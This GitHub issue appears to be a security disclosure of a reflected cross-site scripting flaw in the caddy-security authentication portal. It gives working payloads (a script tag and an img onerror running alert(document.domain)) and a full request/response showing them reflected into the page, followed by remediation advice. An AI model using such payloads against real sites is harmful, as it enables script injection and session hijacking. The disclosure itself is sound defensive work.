Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Reflected Cross-Site Scripting #264

Open
ahpaleus opened this issue Sep 19, 2023 · 0 comments
Open

Reflected Cross-Site Scripting #264

ahpaleus opened this issue Sep 19, 2023 · 0 comments
Assignees
Labels

Comments

@ahpaleus
Copy link

ahpaleus commented Sep 19, 2023

Severity: High

Reflected XSS occurs when an application includes untrusted data in the HTML response sent to the user’s browser. In this case, the provided /admin%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/admin/login or /settings/mfa/delete/<img%20src=x%20onerror=alert(document.domain)> API calls trigger an alert. An attacker can exploit this vulnerability to execute arbitrary JavaScript code within the target user’s browser, potentially leading to further attacks such as session hijacking.

Example request-response cycle that triggers alert:

GET /adminhxuk8%22%3e%3cscript%3ealert(document.domain)%3c/script%3ecsdz9/admin/login HTTP/2
Host: internal.caddysecurity.portal
Cookie: AUTHP_SESSION_ID=XYZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
HTTP/2 200 OK
Content-Type: text/html
Server: Fly/a0b91024 (2023-06-13)
Date: Wed, 19 Jul 2023 08:07:56 GMT
Via: 2 fly.io
Fly-Request-Id: 01H5PK218K0V14GFS0GB3XDF31-waw

<!DOCTYPE html>
<html lang="en" class="h-full bg-blue-100">
  <head>
    <title>Authentication Portal - Sign In</title>
    <!-- Required meta tags -->
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta name="description" content="Performs user authentication." />
    <meta name="author" content="Paul Greenberg github.com/greenpau" />
    <link rel="shortcut icon" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/images/favicon.png" type="image/png" />
    <link rel="icon" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/images/favicon.png" type="image/png" />
    <link rel="stylesheet" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/google-webfonts/roboto.css" />
    <link rel="stylesheet" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/line-awesome/line-awesome.css" />
    <link rel="stylesheet" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/css/login.css" />
    
  </head>

  
  


  <body class="h-full">
    <div class="app-page">
      <div class="app-content">
        <div class="app-container">
          <div class="logo-box">
            
              <img class="logo-img" src="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/images/logo.svg" alt="Authentication Portal" />
            
            <h2 class="logo-txt">Sign In</h2>
          </div>

          

          
            <div id="authenticators" class="flex flex-col gap-2">
              
                <div>
                  
                    <a href="oauth2/google">
                      <div class="app-login-btn-box">
                        <div class="p-4 bg-[#e53935] text-[white] shadow-sm rounded-l-md text-2xl">
                          <i class="lab la-google la-2x"></i>
                        </div>
                        <div class="app-login-btn-txt">
                          <span class="uppercase leading-loose">Google</span>
                        </div>
                      </div>
                    </a>
                  
                </div>
              
            </div>
          
        </div>
        <div id="bookmarks" class="px-4 hidden sm:block">
          <div onclick="showQRCode('/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/qrcode/login.png');return false;" class="bg-[#24292f] text-[#f6f8fa] py-1 px-1 shadow-xl rounded-b-lg pb-2 text-center" style="max-width: 3em;">
            <i class="las la-qrcode text-3xl"></i>
          </div>
        </div>
        <div id="qr" class="px-4 flex justify-center hidden">
          <div id="qrcode" onclick="hideQRCode();return false;" class="bg-white border border-t-2 py-1 px-1 shadow-xl rounded-b-lg pb-2 max-w-xs inline-flex"></div>
        </div>
      </div>
    </div>
    <!-- JavaScript -->
    <script src="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/js/login.js"></script>
    
  </body>
</html>

To immediately address this issue, strategically treat all string values as potentially untrustworthy, regardless of their source, and escape them properly (using the safehtml/template package that generates output-safe HTML).

In addition to that remediation, we also suggest a few different ways to improve defense in depth:

  • Extend unit tests with potentially malicious XSS payloads. Refer to the Cross-site scripting (XSS) cheat sheet for various attack vectors.
  • Consider using the Active Scanner from Burp Suite Professional in a testing environment for all API calls. Additionally, use the scanning with a live task strategy to have underlying requests scanned automatically when interacting with the web interface.
  • Expand the caddy-security documentation to promote security headers—especially the Content Security Policy (CSP) header that controls which resources can be loaded by the browser, limiting the impact of potential XSS attacks.

More information about the issue and our public disclosure:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants